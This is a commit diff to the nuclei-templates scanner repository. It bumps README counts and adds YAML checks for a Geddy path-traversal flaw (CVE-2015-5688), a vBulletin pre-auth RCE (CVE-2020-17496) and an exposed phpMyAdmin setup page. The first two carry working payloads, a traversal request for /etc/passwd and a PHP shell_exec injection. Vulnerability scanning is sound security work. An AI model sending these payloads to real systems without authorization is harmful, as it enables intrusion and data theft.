commit
0ee21e4cdc
|
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||
| cves | 204 | vulnerabilities | 96 | exposed-panels | 74 |
|
||||
| cves | 206 | vulnerabilities | 96 | exposed-panels | 74 |
|
||||
| exposures | 55 | technologies | 46 | misconfiguration | 48 |
|
||||
| workflows | 21 | miscellaneous | 12 | default-logins | 10 |
|
||||
| workflows | 21 | miscellaneous | 13 | default-logins | 10 |
|
||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||
| helpers | 2 | takeovers | 1 | - | - |
|
||||
|
||||
**61 directories, 597 files**.
|
||||
**61 directories, 600 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2015-5688
|
||||
|
||||
info:
|
||||
name: Geddy before v13.0.8 LFI
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
issues: https://github.com/geddy/geddy/issues/697
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688
|
||||
tags: cve,cve2015,geddy,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2020-17496
|
||||
info:
|
||||
name: vBulletin Pre-Auth RCE
|
||||
author: pussycat0x
|
||||
severity: critical
|
||||
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
|
||||
tags: cve,cve2020,vbulletin,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: phpmyadmin-setup
|
||||
|
||||
info:
|
||||
name: Publicly Accessible Phpmyadmin Setup
|
||||
author: sheikhrishad
|
||||
severity: medium
|
||||
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/_phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/php/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/web/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
|
||||
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "You want to configure phpMyAdmin using web interface"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue